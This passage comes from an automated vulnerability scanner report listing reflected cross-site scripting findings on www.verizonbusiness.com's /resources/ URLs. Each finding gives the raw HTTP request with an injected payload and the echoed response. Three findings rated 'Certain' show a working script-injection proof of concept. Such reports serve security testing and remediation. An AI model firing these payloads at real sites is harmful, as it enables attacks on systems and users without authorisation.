var request='/resources/c56bd';87f7b6050ac'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.577. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8bdb"%3bcc80320f83e was submitted in the REST URL parameter 1. This input was echoed as c8bdb";cc80320f83e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc8bdb"%3bcc80320f83e/1002a2a1-111-Business+Continuity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc8bdb";cc80320f83e/1002a2a1-111-Business+Continuity.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.578. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1d5'%3b1eae690fc61 was submitted in the REST URL parameter 1. This input was echoed as 1e1d5';1eae690fc61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources1e1d5'%3b1eae690fc61/1002a2a1-111-Business+Continuity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources1e1d5';1eae690fc61/1002a2a1-111-Business+Continuity.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.579. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1ad'%3b28303c63a05 was submitted in the REST URL parameter 2. This input was echoed as 6e1ad';28303c63a05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/6e1ad'%3b28303c63a05 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/6e1ad';28303c63a05'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.580. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a1-111-Business+Continuity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f23</script><script>alert(1)</script>e000cc915b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a1-111-Business+Continuity.xml31f23</script><script>alert(1)</script>e000cc915b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e239dccb3725e4506fe71edcc99e6157"
Last-Modified: Wed, 17 Nov 2010 00:20:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:20:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dcaff9112-2645-4173-b59b-e1ece2d78b02|VTID%3de1888a62-ed73-4a09-95c0-e9225d48400e|SX%3d1289954456|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:24:40 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:20:56 GMT
Content-Length: 33730

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a1-111-Business+Continuity.xml31f23</script><script>alert(1)</script>e000cc915b</url>
...[SNIP]...

1.581. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a03a'%3bcefbe8dc7d6 was submitted in the REST URL parameter 1. This input was echoed as 3a03a';cefbe8dc7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3a03a'%3bcefbe8dc7d6/1002a2a10-111-Security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources3a03a';cefbe8dc7d6/1002a2a10-111-Security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.582. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f46e"%3ba2ecaf928d1 was submitted in the REST URL parameter 1. This input was echoed as 7f46e";a2ecaf928d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f46e"%3ba2ecaf928d1/1002a2a10-111-Security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:21 GMT
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources7f46e";a2ecaf928d1/1002a2a10-111-Security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.583. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e63'%3bdecedaf7f16 was submitted in the REST URL parameter 2. This input was echoed as 42e63';decedaf7f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/42e63'%3bdecedaf7f16 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/42e63';decedaf7f16'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.584. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a10-111-Security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d07</script><script>alert(1)</script>210f408e6e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a10-111-Security.xmlf8d07</script><script>alert(1)</script>210f408e6e4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "5310c48f248aa1ae2fbd241e707a7282"
Last-Modified: Wed, 17 Nov 2010 00:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d4e75142d-36fb-4ed8-a578-c8f0f2c8f50b|VTID%3df08c3071-fb04-4503-9f5c-997b13301173|SX%3d1289954830|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:54 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:27:10 GMT
Content-Length: 101280

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a10-111-Security.xmlf8d07</script><script>alert(1)</script>210f408e6e4</url>
...[SNIP]...

1.585. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0f61"%3b486aed0de2b was submitted in the REST URL parameter 1. This input was echoed as f0f61";486aed0de2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf0f61"%3b486aed0de2b/1002a2a11-111-Voice.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf0f61";486aed0de2b/1002a2a11-111-Voice.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.586. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8957c'%3b782f7b3d71b was submitted in the REST URL parameter 1. This input was echoed as 8957c';782f7b3d71b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8957c'%3b782f7b3d71b/1002a2a11-111-Voice.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:44 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources8957c';782f7b3d71b/1002a2a11-111-Voice.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.587. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca8c</script><script>alert(1)</script>6866bdc58a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a11-111-Voice.xml5ca8c</script><script>alert(1)</script>6866bdc58a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "566b9899418775066f21b841000ea736"
Last-Modified: Wed, 17 Nov 2010 00:29:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d86e6851c-70a7-4edb-8993-369aaa38c77f|VTID%3df5ad4583-bbec-4394-a6e1-eab65577ed53|SX%3d1289954961|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:33:05 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:21 GMT
Content-Length: 34985

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a11-111-Voice.xml5ca8c</script><script>alert(1)</script>6866bdc58a7</url>
...[SNIP]...

1.588. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a11-111-Voice.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6065d'%3b95e249ab580 was submitted in the REST URL parameter 2. This input was echoed as 6065d';95e249ab580 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/6065d'%3b95e249ab580 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/6065d';95e249ab580'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.589. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a12-111-VoIP.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e32"%3b71ce5c2352a was submitted in the REST URL parameter 1. This input was echoed as d0e32";71ce5c2352a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd0e32"%3b71ce5c2352a/1002a2a12-111-VoIP.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:22 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

